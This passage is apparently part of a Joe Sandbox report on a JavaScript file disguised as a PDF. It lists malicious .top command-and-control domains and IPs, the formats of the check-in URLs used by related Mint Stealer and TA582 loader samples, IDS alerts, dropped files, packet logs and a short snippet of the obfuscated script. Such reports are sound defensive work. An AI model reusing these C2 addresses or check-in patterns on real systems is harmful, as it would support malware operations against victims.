00000003.00000002.79881311037.0000016D2C0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2C09D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://0.google.com/powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.comhpowershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/finance?tab=wepowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.google.compowershell.exe, 00000003.00000002.79881311037.0000016D2A8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/PesterXzpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://apis.google.compowershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ocsp.quovadisoffshore.com0powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.blogger.com/?tab=wjpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.pngpowershell.exe, 00000003.00000002.79881311037.0000016D2BF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.wpowershell.exe, 00000003.00000002.79921044319.0000016D42C96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/?tab=wopowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.79910993215.0000016D3A522000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://0.googlepowershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://mail.google.com/mail/?tab=wmpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.com/logos/doodles/2024/celebratinpowershell.exe, 00000003.00000002.79881311037.0000016D2B323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.google.com/preferences?hl=enpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79919565751.0000016D42B84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/?tab=w1powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://0.google.powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://0.google.com/powershell.exe, 00000003.00000002.79881311037.0000016D2B353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.google.com/history/optout?hl=enpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ion=v4.5powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://books.google.com/?hl=en&tab=wppowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.quovadis.bm0powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://gidcldeaccadneh.toppowershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://aka.ms/pscore68powershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                206.188.196.25
                                                                                                		sfibhzu3ubhza.topUnited States
                                                                                                		55002DEFENSE-NETUStrue
                                                                                                206.188.196.37
                                                                                                		gidcldeaccadneh.topUnited States
                                                                                                		55002DEFENSE-NETUStrue
                                                                                                74.125.136.106
                                                                                                		www.google.comUnited States
                                                                                                		15169GOOGLEUSfalse

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1556633
                                                                                                Start date and time:2024-11-15 18:21:38 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 5m 52s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                Run name:Suspected VM Detection
                                                                                                Number of analysed new started processes analysed:5
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:_DRP12938938231_PDF.js
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.expl.evad.winJS@4/5@3/3
                                                                                                EGA Information:Failed
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 21
                                                                                                • Number of non-executed functions: 9
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .js
                                                                                                • Stop behavior analysis, all processes terminated

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1796 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: _DRP12938938231_PDF.js

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                12:23:46API Interceptor42x Sleep call for process: powershell.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                206.188.196.2582tI00QdFy.ps1Get hashmaliciousUnknownBrowse
                                                                                                • gibuzuy37v2v.top/1.php?s=mints13
                                                                                                peXF7I6W.ps1Get hashmaliciousUnknownBrowse
                                                                                                • gibuzuy37v2v.top/1.php?s=mints13
                                                                                                Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                                                                • gibuzuy37v2v.top/1.php?s=mints13
                                                                                                Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                                                                • gibuzuy37v2v.top/1.php?s=mints13
                                                                                                206.188.196.37ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13
                                                                                                ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/kdv0uaf47hhtr.php?id=user-PC&key=111095586772&s=mints13
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • gidcldeaccadneh.top/d3q2k547nrhtr.php?id=computer&key=49178848774&s=mints21
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • gidcldeaccadneh.top/xuceh2n0lohtr.php?id=user-PC&key=57894837609&s=mints21
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/06c2d9sea1htr.php?id=computer&key=21152678751&s=mints13
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/276lca0oqkhtr.php?id=computer&key=55933565450&s=mints13
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/9mtlfardohhtr.php?id=user-PC&key=89774062466&s=mints13
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/5nyvigqht1htr.php?id=user-PC&key=79290330744&s=mints13
                                                                                                Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                                • gidcldeaccadneh.top/fpmerz30vyhtr.php?id=computer&key=44154737485&s=mints13

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                gidcldeaccadneh.topryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • 206.188.196.37
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                DEFENSE-NETUSryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • 206.188.196.37
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                DEFENSE-NETUSryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • 206.188.196.37
                                                                                                Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37
                                                                                                Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 206.188.196.37

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:@...e...........................................................

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3n3q4xid.5sl.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejg1uguh.afz.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oymnjur0.5n3.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpm5aiq.jad.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ASCII text, with very long lines (1153)
                                                                                                Entropy (8bit):5.2574100513146345
                                                                                                TrID:
                                                                                                  File name:_DRP12938938231_PDF.js
                                                                                                  File size:12'898 bytes
                                                                                                  MD5:b05ee915cdbdb359f19b8e42acebaf48
                                                                                                  SHA1:f8a4866dd81dde78f6f1a1e11a9594fcbce71612
                                                                                                  SHA256:41facb3e96a81c04259c40c2170e6dc53047838e0f918dba889fc6510bc4374d
                                                                                                  SHA512:59abbd040beb90ff17317e51a700344c157fae47d80872609272e3b1b5354b4b2261d61addaa920336fde068b9d43efe270e1da04a1b400e7cc9b5261556976d
                                                                                                  SSDEEP:192:Jxw9SBFDvaPs2cj0ocV3/YBM7fEo03oTxqeDnzaZ8G9+FTTIgSN8U0U5E06JUDld:Jd33MjzWZ9+FXIxRp6Jc3ruM
                                                                                                  TLSH:514297287BAF65017D172E8D273FC010EA2060331586E938765EF690AF6D619D7DCEB8
                                                                                                  File Content Preview:var whichburton0wallsand = whichburton0theirreign;.var whichburton0thispopular = whichburton0theirreign;.function whichburton0theirreign(intohave, theirreign) {. var wallsand = whichburton0intohave();. whichburton0theirreign = function (thispopular,

                                                                                                  File Icon

                                                                                                  Icon Hash:68d69b8bb6aa9a86

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-11-15T18:23:48.092606+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.11.2049763206.188.196.2580TCP
                                                                                                  2024-11-15T18:23:48.092606+01002858291ETPRO MALWARE TA582 CnC Checkin1192.168.11.2049763206.188.196.2580TCP
                                                                                                  2024-11-15T18:23:50.224181+01002859003ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20566191.1.1.153UDP
                                                                                                  2024-11-15T18:23:51.210209+01002856654ETPRO MALWARE TA582 CnC Checkin1192.168.11.2049764206.188.196.3780TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 15, 2024 18:23:47.324651003 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:47.536147118 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:47.536319017 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:47.539793968 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:47.751228094 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092417955 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092439890 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092454910 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092600107 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092606068 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:48.092628002 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092643023 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.092914104 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:48.092963934 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.093003035 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.093018055 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.093030930 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.093245983 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:48.304362059 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.304380894 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.304395914 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.304423094 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.304542065 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:48.304675102 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:48.304717064 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.304733992 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.304744959 CET8049763206.188.196.25192.168.11.20
                                                                                                  Nov 15, 2024 18:23:48.305061102 CET4976380192.168.11.20206.188.196.25
                                                                                                  Nov 15, 2024 18:23:50.406198978 CET4976480192.168.11.20206.188.196.37
                                                                                                  Nov 15, 2024 18:23:50.621330976 CET8049764206.188.196.37192.168.11.20
                                                                                                  Nov 15, 2024 18:23:50.621634960 CET4976480192.168.11.20206.188.196.37
                                                                                                  Nov 15, 2024 18:23:50.621809959 CET4976480192.168.11.20206.188.196.37
                                                                                                  Nov 15, 2024 18:23:50.836781025 CET8049764206.188.196.37192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.155949116 CET8049764206.188.196.37192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.210208893 CET4976480192.168.11.20206.188.196.37
                                                                                                  Nov 15, 2024 18:23:51.278289080 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.396305084 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.396569967 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.396631002 CET4976580192.168.11.2074.125.136.106
                                                                                                  Nov 15, 2024 18:23:51.514487028 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.569926023 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.569962978 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.569989920 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570015907 CET804976574.125.136.106192.168.11.20
                                                                                                  Nov 15, 2024 18:23:51.570044041 CET804976574.125.136.106192.168.11.20
